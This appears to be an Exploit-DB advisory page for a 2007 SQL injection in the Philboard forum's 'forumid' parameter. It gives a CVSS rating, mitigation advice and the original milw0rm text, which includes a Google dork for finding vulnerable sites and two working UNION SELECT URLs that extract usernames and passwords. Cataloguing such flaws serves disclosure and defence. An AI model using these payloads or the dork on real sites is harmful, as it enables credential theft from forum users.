Philboard (id) Remote SQL Injection

vendor:

Philboard

by:

xoron

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Philboard

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Philboard (id) Remote SQL Injection

The vulnerability exists in the 'philboard_forum.asp' file, where an attacker can inject SQL queries through the 'forumid' parameter. By manipulating the SQL query, an attacker can retrieve sensitive information such as usernames and passwords from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input before using it in SQL queries or use prepared statements.

Source

Exploit-DB raw data:

----------------------------------------------------

Philboard (id) Remote SQL Injection

----------------------------------------------------

Bulan: xoron

xoron.info - xoron.biz

Google Dork : "Powered by Philboard" , "inurl:philboard_forum.asp"

----------------------------------------------------

Exploit: philboard_forum.asp?forumid=[SQL]

----------------------------------------------------

Example:

Username
philboard_forum.asp?forumid=-1+union+select+0,username,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users

Password
philboard_forum.asp?forumid=-1+union+select+0,password,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users

----------------------------------------------------

Forum: username + password

----------------------------------------------------

Download: open http://www.aspindir.com/indir.asp?id=3538 and click "Ãndirmek iÃ§in tÃ½klayÃ½n" .

----------------------------------------------------

# milw0rm.com [2007-02-12]